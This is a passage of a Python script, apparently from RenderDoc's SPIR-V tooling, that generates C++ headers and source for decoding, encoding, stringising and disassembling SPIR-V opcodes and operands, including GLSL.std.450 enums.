struct_values += " {} {};\n".format(kind['type'], subparam_name)
if new_value:
if value_enum:
decode_cases += ' '
encode_cases += ' '
decode_cases += ' ret.{}.{} = {};\n'.format(param_name, subparam_name, kinds[param['kind']]['from_words']('it.word(word+{})'.format(i)))
encode_cases += ' {}\n'.format(kinds[param['kind']]['push_words']('param.{}.{}'.format(param_name, subparam_name)))
if kinds[param['kind']]['is_id']:
tostr_cases += ' + idName(el.{}.{}) + '.format(param_name, subparam_name)
else:
tostr_cases += ' + ToStr(el.{}.{}) + '.format(param_name, subparam_name)
assign += " {0}.{1} = {1};".format(param_name, subparam_name)
ret_assign += " ret.{0}.{1} = {0}.{1};\n".format(param_name, subparam_name)
params += "{} {}".format(kind['type'], subparam_name)
if i != len(value['parameters'])-1:
params += ", "
tostr_cases += '", " '
if new_value:
tostr_cases += '")"'
header.write('''struct {struct_name}
{{
{struct_values}
}};
'''.format(struct_name = struct_name, struct_values = struct_values.rstrip()))
if new_value:
if value_enum:
decode_cases += ' word += {};\n'.format(size)
decode_cases += ' break;\n'
encode_cases += ' break;\n'
tostr_cases += '; break;\n'
else:
decode_cases += ' word += {};\n'.format(size)
decode_cases += ' }\n'
encode_cases += ' }\n'
word_count_cases += ' case {}::{}: return {};\n'.format(name, value['enumerant'], size)
constructors += '''template<>\nstruct {name}Param<{name}::{value}>
{{
{member}
{name}Param({params}) {{ {assign} }}
operator {name}AndParamData()
{{
{name}AndParamData ret({name}::{value});
{ret_assign}
return ret;
}}
}};
'''.format(value=value['enumerant'], member=member.rstrip(), name=name, params=params, assign=assign, ret_assign=ret_assign.rstrip())
if new_value and bit_enum:
tostr_cases += ' ", ";\n'
set_unset += ''' void set{flag}({params}) {{ flags |= {name}::{flag};{assign} }}
void unset{flag}() {{ flags &= ~{name}::{flag}; }}
'''.format(flag=value['enumerant'], name=name, params=params, assign=assign)
if constructors != '':
constructors = 'template<{name} val> struct {name}Param;\n\n'.format(name=name) + constructors
# ValueEnums are set up as one or many pairs of enum/params, enum/params, etc. So we declare a struct for the pair
# and declare an array if the op wants many
if value_enum:
tostrs += '''template<>
rdcstr ParamToStr(const std::function<rdcstr(rdcspv::Id)> &idName, const rdcspv::{name}AndParamData &el)
{{
rdcstr ret = ToStr(el.value);
switch(el.value)
{{
{tostr_cases}
default:
break;
}}
return ret;
}}
'''.format(name=name, tostr_cases=tostr_cases.rstrip())
tostr_decls += '''template<>
rdcstr ParamToStr(const std::function<rdcstr(rdcspv::Id)> &idName, const rdcspv::{name}AndParamData &el);'''.format(name=name)
header.write('''struct {name}AndParamData
{{
{name}AndParamData({name} v = {name}::Invalid) : value(v) {{}}
{name} value;
union
{{
{values}
}};
operator {name}() const {{ return value; }}
bool operator ==(const {name} v) const {{ return value == v; }}
}};
'''.format(name=name, values=values.rstrip()))
ops_header.write('''{constructors}
template<>
inline {name}AndParamData DecodeParam(const ConstIter &it, uint32_t &word)
{{
if(word >= it.size()) return {name}AndParamData();
{name}AndParamData ret(({name})it.word(word));
word++;
switch(ret.value)
{{
{decode_cases}
default: break;
}}
return ret;
}}
inline void EncodeParam(rdcarray<uint32_t> &words, const {name}AndParamData ¶m)
{{
words.push_back((uint32_t)param.value);
switch(param.value)
{{
{encode_cases}
default: break;
}}
}}
'''.format(name=name, value_name=operand_name(name), decode_cases=decode_cases.rstrip(),
constructors=constructors, encode_cases=encode_cases.rstrip()))
operand_kind['type'] = '{}AndParamData'.format(name)
# BitEnums are set up with one bitmask, and then a series of parameters, so we declare a struct with an array
elif bit_enum:
tostrs += '''template<>
rdcstr ParamToStr(const std::function<rdcstr(rdcspv::Id)> &idName, const rdcspv::{name}AndParamDatas &el)
{{
rdcstr ret;
{tostr_cases}
// remove trailing ", "
if(ret.size() > 2)
ret.erase(ret.size()-2, 2);
return ret;
}}
'''.format(name=name, tostr_cases=tostr_cases.rstrip())
tostr_decls += '''template<>
rdcstr ParamToStr(const std::function<rdcstr(rdcspv::Id)> &idName, const rdcspv::{name}AndParamDatas &el);'''.format(name=name)
header.write('''struct {name}AndParamDatas
{{
{name}AndParamDatas({name} f = {name}::None) : flags(f) {{}}
{name} flags;
{values}
operator {name}() const {{ return flags; }}
bool operator &(const {name} v) const {{ return bool(flags & v); }}
{set_unset}
}};
'''.format(name=name, values=values.rstrip(), set_unset=set_unset.rstrip()))
ops_header.write('''template<>
inline {name}AndParamDatas DecodeParam(const ConstIter &it, uint32_t &word)
{{
if(word >= it.size()) return {name}AndParamDatas();
{name}AndParamDatas ret(({name})it.word(word));
word++;
{decode_cases}
return ret;
}}
inline void EncodeParam(rdcarray<uint32_t> &words, const {name}AndParamDatas ¶m)
{{
words.push_back((uint32_t)param.flags);
{encode_cases}
}}
'''.format(name=name, decode_cases=decode_cases.rstrip(), encode_cases=encode_cases.rstrip()))
operand_kind['type'] = '{}AndParamDatas'.format(name)
else:
raise TypeError("unexpected operand kind {} with parameters".format(operand_kind['category']))
ops_header.write('''inline uint16_t ExtraWordCount(const {name} {value_name})
{{
switch({value_name})
{{
{word_count_cases}
default: break;
}}
return 0;
}}
'''.format(name = name, value_name = operand_name(name), word_count_cases = word_count_cases.rstrip()))
ops_header.write('''
inline uint16_t ExtraWordCount(const rdcstr &val)
{
return uint16_t(val.size() / 4);
}
inline uint16_t OptionalWordCount(const rdcstr &val)
{
if(val.empty()) return 0;
return uint16_t(val.size() / 4) + 1;
}
inline uint16_t OptionalWordCount(const Id &val)
{
return val != Id() ? 1 : 0;
}
inline uint16_t OptionalWordCount(const PairIdRefLiteralInteger &val)
{
return val.first != Id() ? 2 : 0;
}
inline uint16_t OptionalWordCount(const PairLiteralIntegerIdRef &val)
{
return val.second != Id() ? 2 : 0;
}
inline uint16_t OptionalWordCount(const PairIdRefIdRef &val)
{
return val.first != Id() ? 2 : 0;
}
template<typename Type>
uint16_t MultiWordCount(const rdcarray<Type> &multiParams)
{
uint16_t ret = 0;
for(size_t i=0; i < multiParams.size(); i++)
ret += sizeof(multiParams[i])/sizeof(uint32_t);
return ret;
}
''')
###############################################################################
##
## Opcodes (declare enum / stringise)
##
###############################################################################
# Quickly preprocess, find parameters with duplicated names and disambiguate
for inst in spirv['instructions']:
if 'operands' in inst:
operands = inst['operands']
duplicates = []
for i,A in enumerate(operands):
for j,B in enumerate(operands):
if j <= i:
continue
a = operand_name(A['name'] if 'name' in A else kinds[A['kind']]['def_name'])
b = operand_name(B['name'] if 'name' in B else kinds[B['kind']]['def_name'])
if a == b:
if i not in duplicates:
duplicates.append(i)
if j not in duplicates:
duplicates.append(j)
if len(duplicates) > 0:
for idx,arg in enumerate(duplicates):
A = operands[arg]
operands[arg]['name'] = operand_name(A['name'] if 'name' in A else kinds[A['kind']]['def_name']) + str(idx)
used = []
decl = ''
stringise = ''
op_structs = ''
op_decoder = ''
used_ids = ''
disassemble = ''
for inst in spirv['instructions']:
decl += ' {} = {},\n'.format(inst['opname'][2:], inst['opcode'])
if inst['opcode'] in used:
continue
stringise += ' STRINGISE_ENUM_CLASS({});\n'.format(inst['opname'][2:])
result = -1
resultCount = 0
resultType = -1
used_ids += ' case rdcspv::Op::{}:\n'.format(inst['opname'][2:])
operands = []
if 'operands' in inst:
operands = inst['operands']
last_operand = operands[-1]
for i,operand in enumerate(operands):
if operand['kind'] == 'IdResult':
result = i+1
resultCount += 1
elif 'name' in operand and operand['name'][0:6] == 'result':
resultCount += 1
if operand['kind'] == 'IdResultType':
resultType = i+1
disassemble += ' case rdcspv::Op::{}:\n'.format(inst['opname'][2:])
disassemble += ' {\n'
if any([kinds[operand['kind']]['size'] is None for operand in operands]):
op_struct = 'struct {}; // has operands with variable sizes\n\n'.format(inst['opname'])
disassemble += ' OpDecoder decoded(it);\n'.format(inst['opname'][2:])
if resultCount == 2:
raise ValueError("Unexpected multiple results without decoded opcode")
elif resultType > 0 and result > 0:
disassemble += ' ret += declName(decoded.resultType, decoded.result) + " = ";\n'
elif resultType > 0 and result == -1:
raise ValueError("Unexpected result type without result")
elif resultType == -1 and result > 0:
disassemble += ' ret += idName(decoded.result) + " = ";\n'
disassemble += ' ret += "{}(...)";\n'.format(inst['opname'][2:])
disassemble += ' break;\n'
disassemble += ' }\n'
else:
params = ''
assign = ''
member_decl = ''
size_name = 'FixedWordSize'
construct_size = 'FixedWordSize'
size = 1 # opcode / wordcount packed
all_size = 1 # size, but with all optionals included
iter_init = ' memcpy(this, it.words(), sizeof(*this));'
complex_type = False
manual_init = ' this->op = OpCode;\n'
manual_init += ' this->wordCount = (uint16_t)it.size();\n'
oper_cast = ' operator Operation() const\n {\n rdcarray<uint32_t> words;\n'
has_funcs = ''
disassemble += ' Op{} decoded(it);\n'.format(inst['opname'][2:])
if resultCount == 2:
disassemble += ' ret += declName(decoded.resultType, decoded.result0) + ", " + idName(decoded.result1) + " = ";\n'
elif resultType > 0 and result > 0:
disassemble += ' ret += declName(decoded.resultType, decoded.result) + " = ";\n'
elif resultType > 0 and result == -1:
raise ValueError("Unexpected result type without result")
elif resultType == -1 and result > 0:
disassemble += ' ret += idName(decoded.result) + " = ";\n'
disassemble += ' ret += "{}("'.format(inst['opname'][2:])
disassemble_params = False
if 'operands' in inst:
for i,operand in enumerate(operands):
kind = kinds[operand['kind']]
if kind['has_params'] and not complex_type:
size_name = 'MinWordSize'
construct_size = 'MinWordSize'
complex_type = True
manual_init += ' uint32_t word = {};\n'.format(all_size)
quantifier = ''
if 'quantifier' in operand:
quantifier = operand['quantifier']
if not complex_type:
size_name = 'MinWordSize'
construct_size = 'MinWordSize'
complex_type = True
if quantifier == '*':
manual_init += ' uint32_t word = {};\n'.format(all_size)
if kind['is_id']:
if quantifier == '*':
used_ids += ' for(size_t i=0; i < size-{0}; i++) callback(Id::fromWord(it.word({0}+i)), {1});\n'.format(all_size, 'true' if i+1==result else 'false')
else:
used_ids += ' callback(Id::fromWord(it.word({})), {});\n'.format(all_size, 'true' if i+1==result else 'false')
if kind['size'] < 0:
size_name = 'MinWordSize'
construct_size = 'MinWordSize'
complex_type = True
manual_init += ' uint32_t word = {};\n'.format(all_size)
opType,opName = (kind['type'], operand_name(operand['name'] if 'name' in operand else kind['def_name']))
if i+1 != resultType and i+1 != result:
if quantifier == '*':
disassemble += ' + ParamsToStr(idName, decoded.{})'.format(opName)
else:
if opType == 'IdScope':
disassemble += ' + ToStr(Scope(constIntVal(decoded.{})))'.format(opName)
elif opType == 'IdMemorySemantics':
disassemble += ' + ToStr(MemorySemantics(constIntVal(decoded.{})))'.format(opName)
else:
disassemble += ' + ParamToStr(idName, decoded.{})'.format(opName)
if i+1 < len(operands):
disassemble += ' + ", "'
disassemble_params = True
if quantifier == '?':
params += '{} {} = {}, '.format(opType, opName, kind['def_value'])
elif quantifier == '*':
params += 'const rdcarray<{}> &{} = {{}}, '.format(opType, opName)
else:
params += '{} {}, '.format(opType, opName)
if quantifier == '*':
member_decl += ' rdcarray<{}> {};\n'.format(opType, opName)
else:
member_decl += ' {} {};\n'.format(opType, opName)
assign += ' this->{} = {};\n'.format(opName, opName)
if operand['kind'] == 'LiteralString':
if quantifier == '*':
raise ValueError('operand {} in {} is string but has * quantifier'.format(opName, inst['opname']))
manual_init += ' this->{name} = DecodeParam<{type}>(it, word);\n'.format(name = opName, type = opType)
oper_cast += ' EncodeParam(words, {name});\n'.format(name = opName)
if quantifier == '?':
construct_size += ' + OptionalWordCount({})'.format(opName)
has_funcs += ' bool Has{name}() const {{ return wordCount > {idx}; }}\n'.format(idx = all_size, name = opName[0].upper() + opName[1:])
else:
construct_size += ' + ExtraWordCount({})'.format(opName)
elif kind['has_params']:
if quantifier == '*':
raise ValueError('operand {} in {} has * quantifier and params'.format(opName, inst['opname']))
manual_init += ' this->{name} = DecodeParam<{type}>(it, word);\n'.format(name = opName, type = opType)
oper_cast += ' EncodeParam(words, {name});\n'.format(name = opName)
construct_size += ' + ExtraWordCount({})'.format(opName)
elif quantifier == '*':
manual_init += ' this->{name} = MultiParam<{type}>(it, word);\n'.format(name = opName, type = opType)
construct_size += ' + MultiWordCount({})'.format(opName)
oper_cast += ' for(size_t i=0; i < {name}.size(); i++)\n'.format(name = opName)
oper_cast += ' {\n'
oper_cast += ' {push_words}\n'.format(push_words = kind['push_words']('{}[i]'.format(opName)))
oper_cast += ' }\n'
elif quantifier == '?':
manual_init += ' this->{name} = (it.size() > {idx}) ? {value} : {def_value};\n'.format(name = opName, type = opType, idx = all_size, value = kind['from_words']('it.word({})'.format(all_size)), def_value=kind['def_value'])
construct_size += ' + OptionalWordCount({})'.format(opName)
oper_cast += ' if({name} != {def_value}) {push_words}\n'.format(name = opName, def_value=kind['def_value'], push_words = kind['push_words'](opName))
has_funcs += ' bool Has{name}() const {{ return wordCount > {idx}; }}\n'.format(idx = all_size, name = opName[0].upper() + opName[1:])
else:
manual_init += ' this->{name} = {value};\n'.format(name = opName, type = opType, value = kind['from_words']('it.word({})'.format(all_size)))
oper_cast += ' {push_words}\n'.format(push_words = kind['push_words'](opName))
if kind['size'] >= 0:
all_size += kind['size']
else:
all_size += 1
if quantifier == '':
size = all_size
else:
assign = ' // no operands'
member_decl = ' // no operands'
if complex_type:
iter_init = manual_init.rstrip()
oper_cast += ' return Operation(OpCode, words);\n }\n'
else:
oper_cast = ''
if params != '':
params = params[0:-2]
if disassemble_params:
disassemble += ' + ")";\n'
else:
disassemble += ' ")";\n'
disassemble += ' break;\n'
disassemble += ' }\n'
if has_funcs != '':
has_funcs = '\n\n' + has_funcs
op_struct = '''struct {name}
{{
{name}(const ConstIter &it)
{{
{iter_init}
}}
{name}({params})
: op(Op::{opname})
, wordCount({construct_size})
{{
{assign}
}}
{oper_cast}
static constexpr Op OpCode = Op::{opname};
static constexpr uint16_t {size_name} = {size}U;
Op op;
uint16_t wordCount;
{member_decl}{has_funcs}
}};
'''.format(opname=inst['opname'][2:], name=inst['opname'], params=params, iter_init=iter_init, assign=assign.rstrip(),
member_decl=member_decl.rstrip(), size_name=size_name, construct_size=construct_size,
oper_cast=oper_cast, size=size, has_funcs=has_funcs.rstrip())
op_structs += op_struct
# Sanity check that quantifiers only happen on final operands. Also if there are multiple they are all ?, not *
if 'operands' in inst:
operands = inst['operands']
last_operand = operands[-1]
for operand in operands:
if operand != last_operand and 'quantifier' in operand and ('quantifier' not in last_operand or last_operand['quantifier'] != operand['quantifier'] or operand['quantifier'] != '?'):
raise ValueError('quantifier on operand {} in {} but not on last operand'.format(operand['name'], inst['opname']))
used_ids += ' break;\n'
if result < 0:
result = ' result = Id();'
else:
result = ' result = Id::fromWord(it.word({}));'.format(result)
if resultType < 0:
resultType = ' resultType = Id();'
else:
resultType = ' resultType = Id::fromWord(it.word({}));'.format(resultType)
op_decoder += ' case rdcspv::Op::{}:{}{} break;\n'.format(inst['opname'][2:], result, resultType)
used.append(inst['opcode'])
header.write('''enum class Op : uint16_t
{{
{decl}
Max,
}};
'''.format(decl = decl))
ops_header.write('''
{op_structs}
template<typename T>
inline rdcstr ParamToStr(const std::function<rdcstr(rdcspv::Id)> &idName, const T &el)
{{
return ToStr(el);
}}
template<>
rdcstr ParamToStr(const std::function<rdcstr(rdcspv::Id)> &idName, const Id &el);
template<>
rdcstr ParamToStr(const std::function<rdcstr(rdcspv::Id)> &idName, const rdcstr &el);
template<>
rdcstr ParamToStr(const std::function<rdcstr(rdcspv::Id)> &idName, const PairLiteralIntegerIdRef &el);
template<>
rdcstr ParamToStr(const std::function<rdcstr(rdcspv::Id)> &idName, const PairIdRefLiteralInteger &el);
template<>
rdcstr ParamToStr(const std::function<rdcstr(rdcspv::Id)> &idName, const PairIdRefIdRef &el);
{tostr_decls}
template<typename U>
inline rdcstr ParamsToStr(const std::function<rdcstr(rdcspv::Id)> &idName, const rdcarray<U> &ids)
{{
rdcstr ret = "{{";
for(size_t i=0; i < ids.size(); i++)
{{
ret += ParamToStr(idName, ids[i]);
if(i + 1 < ids.size())
ret += ", ";
}}
ret += "}}";
return ret;
}}
struct OpDecoder
{{
OpDecoder(const ConstIter &it);
static void ForEachID(const ConstIter &it, const std::function<void(Id,bool)> &callback);
static rdcstr Disassemble(const ConstIter &it, const std::function<rdcstr(Id,Id)> &declName, const std::function<rdcstr(rdcspv::Id)> &idName, const std::function<uint32_t(Id)> &constIntVal);
Op op;
uint16_t wordCount;
Id result;
Id resultType;
}};
'''.format(op_structs = op_structs.rstrip(), tostr_decls = tostr_decls))
cpp.write('''template <>
rdcstr DoStringise(const rdcspv::Op &el)
{{
BEGIN_ENUM_STRINGISE(rdcspv::Op);
{{
{stringise}
}}
END_ENUM_STRINGISE();
}}
namespace rdcspv
{{
template<>
rdcstr ParamToStr(const std::function<rdcstr(rdcspv::Id)> &idName, const Id &el)
{{
return idName(el);
}}
template<>
rdcstr ParamToStr(const std::function<rdcstr(rdcspv::Id)> &idName, const rdcstr &el)
{{
return "\\"" + el + "\\"";
}}
template<>
rdcstr ParamToStr(const std::function<rdcstr(rdcspv::Id)> &idName, const PairLiteralIntegerIdRef &el)
{{
return StringFormat::Fmt("[%u, %s]", el.first, idName(el.second).c_str());
}}
template<>
rdcstr ParamToStr(const std::function<rdcstr(rdcspv::Id)> &idName, const PairIdRefLiteralInteger &el)
{{
return StringFormat::Fmt("[%s, %u]", idName(el.first).c_str(), el.second);
}}
template<>
rdcstr ParamToStr(const std::function<rdcstr(rdcspv::Id)> &idName, const PairIdRefIdRef &el)
{{
return StringFormat::Fmt("[%s, %s]", idName(el.first).c_str(), idName(el.second).c_str());
}}
{tostrs}
void OpDecoder::ForEachID(const ConstIter &it, const std::function<void(Id,bool)> &callback)
{{
size_t size = it.size();
switch(it.opcode())
{{
{used_ids}
case Op::Max: break;
}}
}}
rdcstr OpDecoder::Disassemble(const ConstIter &it, const std::function<rdcstr(Id,Id)> &declName, const std::function<rdcstr(rdcspv::Id)> &idName, const std::function<uint32_t(Id)> &constIntVal)
{{
rdcstr ret;
switch(it.opcode())
{{
{disassemble}
case Op::Max: break;
}}
return ret;
}}
OpDecoder::OpDecoder(const ConstIter &it)
{{
op = it.opcode();
wordCount = (uint16_t)it.size();
switch(op)
{{
{op_decoder}
case Op::Max: break;
}}
}}
}}; // namespace rdcspv
'''.format(stringise = stringise.rstrip(), op_decoder = op_decoder.rstrip(), used_ids = used_ids.rstrip(), disassemble = disassemble.rstrip(), tostrs = tostrs.rstrip()));
###############################################################################
##
## GLSL ext inst set (declare enum)
##
###############################################################################
decl = ''
stringise = ''
for inst in glsl450['instructions']:
decl += ' {} = {},\n'.format(inst['opname'], inst['opcode'])
stringise += ' STRINGISE_ENUM_CLASS({});\n'.format(inst['opname'])
header.write('''enum class GLSLstd450 : uint32_t
{{
{decl}
Max,
Invalid = ~0U,
}};
'''.format(decl = decl))
cpp.write('''template <>
rdcstr DoStringise(const rdcspv::GLSLstd450 &el)
{{
BEGIN_ENUM_STRINGISE(rdcspv::GLSLstd450);
{{
{stringise}
}}
END_ENUM_STRINGISE();
}}
template <>
rdcstr DoStringise(const rdcspv::Generator &el)
{{
BEGIN_ENUM_STRINGISE(rdcspv::Generator);
{{
{generator_tostr}
}}
END_ENUM_STRINGISE();
}}
'''.format(stringise = stringise.rstrip(), generator_tostr = generator_tostr.rstrip()))
header.write('''
}; // namespace rdcspv
DECLARE_STRINGISE_TYPE(rdcspv::GLSLstd450);
DECLARE_STRINGISE_TYPE(rdcspv::Generator);
''')
for operand_kind in spirv['operand_kinds']:
if operand_kind['category'] == 'ValueEnum' or operand_kind['category'] == 'BitEnum':
header.write('DECLARE_STRINGISE_TYPE(rdcspv::{});\n'.format(operand_kind['kind']))
ops_header.write('''
}; // namespace rdcspv
''')
header.close()
ops_header.close()
cpp.close()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.